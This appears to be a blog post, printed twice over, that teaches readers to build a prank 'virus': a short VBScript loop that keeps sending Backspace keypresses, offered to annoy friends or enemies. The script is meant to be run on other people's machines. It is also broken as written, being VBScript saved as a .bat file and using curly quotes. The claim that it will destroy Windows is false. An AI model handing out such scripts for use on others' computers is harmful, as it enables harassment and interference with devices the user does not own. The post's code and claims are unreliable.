There is Trick to make a Virus which can make it so that the Backspace Key is being Pressed Constantly. This Trick can be used to annoy the Friends or Enemy.
Note : Don't Run this Program on your Computer otherwise you will lose your Windows.
I am not Responsible for any Accident caused by this File on your Computer.
To make this simple Virus just follow these simple steps :
1) Open Notepad.
2) Copy and Paste the following Code into Notepad :
MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
3) Save it as Backspace.bat.
4) Now it is done.
So it is a simple Trick to make a Virus which Press Backspace Key Unlimited Times.
Note : Don't Run this Program on your Computer otherwise you will lose your Windows.
I am not Responsible for any Accident caused by this File on your Computer.
To make this simple Virus just follow these simple steps :
1) Open Notepad.
2) Copy and Paste the following Code into Notepad :
MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
3) Save it as Backspace.bat.
4) Now it is done.
So it is a simple Trick to make a Virus which Press Backspace Key Unlimited Times.
0 comments:
Post a Comment